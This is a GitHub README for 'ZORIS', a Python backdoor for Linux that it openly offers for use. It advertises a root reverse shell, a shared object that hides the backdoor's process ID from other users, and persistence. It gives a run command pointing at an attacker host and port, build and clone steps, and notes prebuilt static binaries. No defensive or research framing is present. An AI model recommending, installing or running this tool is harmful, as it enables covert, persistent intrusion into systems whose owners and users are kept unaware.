Skip to content

Latest commit

 

History

History
48 lines (31 loc) · 1.14 KB

README.md

File metadata and controls

48 lines (31 loc) · 1.14 KB

「🚪」ZORIS

ZORIS is a simple backdoor created in python in order to bring the shell of a linux system to a machine through the reverse connection, but make no mistake, ZORIS has a shared object (so) that allows you to hide the PID of the backdoor installed on the system, keeping it out of sight of other users inside the machine and being silent. It is necessary to be the root user, but by activating it, its persistence is certain.

Benefits:

  • Reverse shell connection as root

  • Hide the PID

  • Persistence

Tested linux distro

  • Arch Linux
  • CentOS
  • Debian
  • Fedora
  • openSUSE
  • Gentoo

How to use

# ./zoris -rh <ATTACKER HOST> -rp <ATTACKER PORT>

Installation

# git clone https://github.com/MrEmpy/zoris.git
# chmod +x build.sh
# ./build.sh

Note: If you prefer, we have the ZORIS static binary in the static directory with all dependencies inserted.

Available architecture of static binary

  • amd64
  • i386
  • arm64
  • armv7